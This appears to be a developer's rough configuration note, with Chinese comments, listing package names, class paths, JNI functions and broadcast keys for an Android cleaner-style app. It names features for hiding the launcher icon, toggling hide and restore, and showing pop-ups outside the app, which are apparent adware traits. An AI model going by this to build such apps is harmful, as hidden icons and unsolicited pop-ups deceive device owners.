// 这里面的信息都需要修改
fruit['com.smoke.clears.away.single', 'com.smooths.woclean',  # 包名 // todo
               'amb.show.Sledc',# 透明activity // todo
               'an/bor/SgBbr',  #  广播 // todo
               '','com.smoke.clears.away.single.DcSingle',  # 隐藏图标 other1","main2 // todo
               'an/nee/dc', '"a0"',  # jni路径及函数 // todo
               '/sing',# 外弹文件开关名 // todo
               '"vser"',# 广播接收key // todo
               '"cecas"',  # 恢复 // todo
               '"vffe"',  # 隐藏 // todo
               '"neesl"']  # 外弹 // todo

ban['com.smoke.clears.away.single', 'com.smooths.woclean',  # 包名 // todo
                  'an/nee/dc', // todo
                   '"bsle"','"csing"', '"dsgl"', // todo
                  'an/need/Aher',  # hander // todo
                  'an/need/Beic',  # wvcClass WebViewClient // todo
                  'an/need/Cehl',  # WccClass WebChormeClient // todo
                  '/sing']#文件开关 // todo
钟哥，给一下H5的So呢，包名：com.smooths.woclean                  // todo